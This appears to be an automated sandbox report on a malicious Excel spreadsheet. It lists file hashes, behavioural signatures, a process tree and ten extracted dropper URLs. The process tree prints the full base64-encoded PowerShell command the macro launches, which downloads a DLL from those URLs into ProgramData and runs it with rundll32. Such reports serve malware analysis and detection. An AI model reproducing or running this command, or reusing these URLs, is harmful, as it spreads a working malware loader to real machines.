Analysis

  • max time kernel
    122s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 21:31

General

  • Target

    8f572f31410e7c82ffc210a73ac0f5d484141a425c0f0545485437a4351da180.xls

  • Size

    155KB

  • MD5

    d3e6a5d4a41388fe0b59863727aff764

  • SHA1

    b8be75122d4267d39296087188e1f260a6541fb3

  • SHA256

    8f572f31410e7c82ffc210a73ac0f5d484141a425c0f0545485437a4351da180

  • SHA512

    be02770c42c00058a18a6e7fd3ab6565cadc040f7a042f1f532e4fc552c0fee6618238cff3bee1b771bec7a4cb93b8199153a5a661c16403adc2d75c5ed1b5bf

  • SSDEEP

    3072:dIcKoSsxzNDZLDZjlbR868O8K3A4XQxEtjPOtioVjDGUU1qfDlaGGx+cLYIxA1Gf:icKoSsxzNDZLDZjlbR868O8K3A4XQxER

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rkeeperua.com/include/FXBsVAOd1U/

exe.dropper

http://pozhadvokat.com/images/QmZXA9kRUU8xZZF/

exe.dropper

http://queens.renovatiog.ltd/wp-includes/LDH/

exe.dropper

http://renovatiomarketing.com/renovatiomarketing.com/A/

exe.dropper

http://remedy.eventmasti.com/vendor/Y2XclYoCdDzSSua/

exe.dropper

http://ppdbsma.insanrabbany.sch.id/gkvvb/sXVYo8HsPSFQh/

exe.dropper

http://pinnaclehomesusa.net/870xg9/pNp3a1iHCKaZwYEV/

exe.dropper

http://dandtpremierhomes.com/eapn/lpN6dcAppn/

exe.dropper

http://keluargamalaysia.bliblah.com/cgi-bin/FUzc3KOKN3DNeee/

exe.dropper

http://crisbdev.com/wp-content/2dmXYgLVdkV/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8f572f31410e7c82ffc210a73ac0f5d484141a425c0f0545485437a4351da180.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\programdata\rtyusdj.bat" "
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2248
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AcgBrAGUAZQBwAGUAcgB1AGEALgBjAG8AbQAvAGkAbgBjAGwAdQBkAGUALwBGAFgAQgBzAFYAQQBPAGQAMQBVAC8ALABoAHQAdABwADoALwAvAHAAbwB6AGgAYQBkAHYAbwBrAGEAdAAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBRAG0AWgBYAEEAOQBrAFIAVQBVADgAeABaAFoARgAvACwAaAB0AHQAcAA6AC8ALwBxAHUAZQBlAG4AcwAuAHIAZQBuAG8AdgBhAHQAaQBvAGcALgBsAHQAZAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwARABIAC8ALABoAHQAdABwADoALwAvAHIAZQBuAG8AdgBhAHQAaQBvAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwByAGUAbgBvAHYAYQB0AGkAbwBtAGEAcgBrAGUAdABpAG4AZwAuAGMAbwBtAC8AQQAvACwAaAB0AHQAcAA6AC8ALwByAGUAbQBlAGQAeQAuAGUAdgBlAG4AdABtAGEAcwB0AGkALgBjAG8AbQAvAHYAZQBuAGQAbwByAC8AWQAyAFgAYwBsAFkAbwBDAGQARAB6AFMAUwB1AGEALwAsAGgAdAB0AHAAOgAvAC8AcABwAGQAYgBzAG0AYQAuAGkAbgBzAGEAbgByAGEAYgBiAGEAbgB5AC4AcwBjAGgALgBpAGQALwBnAGsAdgB2AGIALwBzAFgAVgBZAG8AOABIAHMAUABTAEYAUQBoAC8ALABoAHQAdABwADoALwAvAHAAaQBuAG4AYQBjAGwAZQBoAG8AbQBlAHMAdQBzAGEALgBuAGUAdAAvADgANwAwAHgAZwA5AC8AcABOAHAAMwBhADEAaQBIAEMASwBhAFoAdwBZAEUAVgAvACwAaAB0AHQAcAA6AC8ALwBkAGEAbgBkAHQAcAByAGUAbQBpAGUAcgBoAG8AbQBlAHMALgBjAG8AbQAvAGUAYQBwAG4ALwBsAHAATgA2AGQAYwBBAHAAcABuAC8ALABoAHQAdABwADoALwAvAGsAZQBsAHUAYQByAGcAYQBtAGEAbABhAHkAcwBpAGEALgBiAGwAaQBiAGwAYQBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ARgBVAHoAYwAzAEsATwBLAE4AMwBEAE4AZQBlAGUALwAsAGgAdAB0AHAAOgAvAC8AYwByAGkAcwBiAGQAZQB2AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMgBkAG0AWABZAGcATABWAGQAawBWAC8AIgAuAFMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACgAJABzAHQAIABpAG4AIAAkAHIAbwB3AGkAZgBpAHUAZAApAHsAJAByAHIAeQBpAHUAZAA9AEcAZQB0AC0AUgBhAG4AZABvAG0AOwAkAGYAZwBoAGkAdQBzAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJAByAHIAeQBpAHUAZAArACIALgBkAGwAbAAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwB0ACAALQBPAHUAdABGAGkAbABlACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzADsAaQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQB7ACAAaQBmACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAA1ADAAMAAwADAAKQB7ACQAZwBoAEQARABGAEoASABrADUAZgA9ACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHcAbwB3ADYANABcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwAkAHQAeQBpAGQAdQBpAHMAZABmAGYAPQAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKwAiACwAZgAiACsAJABmAGcAaABpAHUAcwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGcAaABEAEQARgBKAEgAawA1AGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJAB0AHkAaQBkAHUAaQBzAGQAZgBmADsAYgByAGUAYQBrADsAfQB9AH0A
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\rtyusdj.bat

    Filesize

    3KB

    MD5

    cfaeca812fe57984781eb36f185e6f35

    SHA1

    58c44284034e1681dca944d989b5d8ffeca6db93

    SHA256

    b52dcbf00c8e24376222b881555b4f1238820d3fdcb993df29b83b111f192c6b

    SHA512

    d69ecb57c5e3a30cffb091c4944ba96871c5dc7958d6bbbed98f05031c6e09a61449aa9babfb7a05382404f988b6ef33d3f64308ac271e04558b1486a7f62c7b

  • memory/2368-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2368-1-0x000000007287D000-0x0000000072888000-memory.dmp

    Filesize

    44KB

  • memory/2368-9-0x0000000005F80000-0x0000000006080000-memory.dmp

    Filesize

    1024KB

  • memory/2368-10-0x0000000006180000-0x0000000006280000-memory.dmp

    Filesize

    1024KB

  • memory/2368-39-0x0000000005F80000-0x0000000006080000-memory.dmp

    Filesize

    1024KB

  • memory/2368-38-0x0000000005F80000-0x0000000006080000-memory.dmp

    Filesize

    1024KB

  • memory/2368-37-0x0000000005F80000-0x0000000006080000-memory.dmp

    Filesize

    1024KB

  • memory/2368-36-0x0000000005F80000-0x0000000006080000-memory.dmp

    Filesize

    1024KB

  • memory/2368-50-0x000000007287D000-0x0000000072888000-memory.dmp

    Filesize

    44KB

  • memory/2368-51-0x0000000005F80000-0x0000000006080000-memory.dmp

    Filesize

    1024KB